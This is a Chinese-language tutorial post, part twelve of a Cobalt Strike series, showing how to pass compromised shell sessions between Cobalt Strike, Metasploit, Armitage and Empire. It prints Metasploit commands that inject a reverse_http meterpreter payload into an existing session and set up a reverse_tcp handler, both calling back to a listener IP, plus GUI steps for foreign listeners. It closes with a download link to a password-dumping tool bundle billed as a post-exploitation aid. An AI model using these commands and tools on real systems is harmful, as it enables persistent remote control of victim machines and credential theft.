Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转

0x000-前文

有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660
2000人网络安全交流群，欢迎大佬们来玩
群号820783253

0x001-Cobaltstrike与MSF会话互转

①Metasploit派生shell给Cobaltstrike

首先，你需要拿到一个metepreter会话，本例中session为1
Cobaltstrike的teamserver的ip为8.8.8.8，http监听器端口为4555

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 8.8.8.8.
msf exploit(payload_inject) > set LPORT 4555
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

如图Cobaltstrike成功上线

②Cobalt strike 派生 shell 给 MSF(前提有个beacon shell)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 8.8.8.8
lhost => 8.8.8.8
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
，并根据metasploit监听配置cobaltstrike的listener

选择要派生的beacon，右键–>增加会话，选择刚刚配置的foreign监听器

MSF即可成功收到会话

0x002-Cobaltstrike与Armitage会话互转

Cobaltstrike派生shell给Armitage

首先在armitage中配置一个handler，注意：payload要与cobaltstrike的foreign监听器的协议相同，不然收不到会话。

同样使用刚刚讲过的cobaltstrike派生会话功能，armitage即可收到shell

Armitage派生shell给cobaltstrike

选择armitage中的会话，右键，Access–>Pss Session

随后配置相关信息为cobaltstrike http监听器的ip和端口

Cobaltstrike即可收到会话

0x003-Cobaltstrike与Empire会话互转

首先如图，在empire中配置好相关的http协议监听器

在cobaltstrike里面添加一个foreign监听器，协议为http

随后使用cobaltstrike中讲过的“增加会话”功能，选择该http监听器，empire即可成功收到会话。

0x004-小福利

今天分享的是神器nirsoft半汉化版，该程序在以管理员的身份运行时，可以读取机器中各种各样的密码，无疑是后渗透的神器之一。

链接：https://pan.baidu.com/s/1Ubh-HKf-FYdUAOxL7ooAGA
提取码：e8pz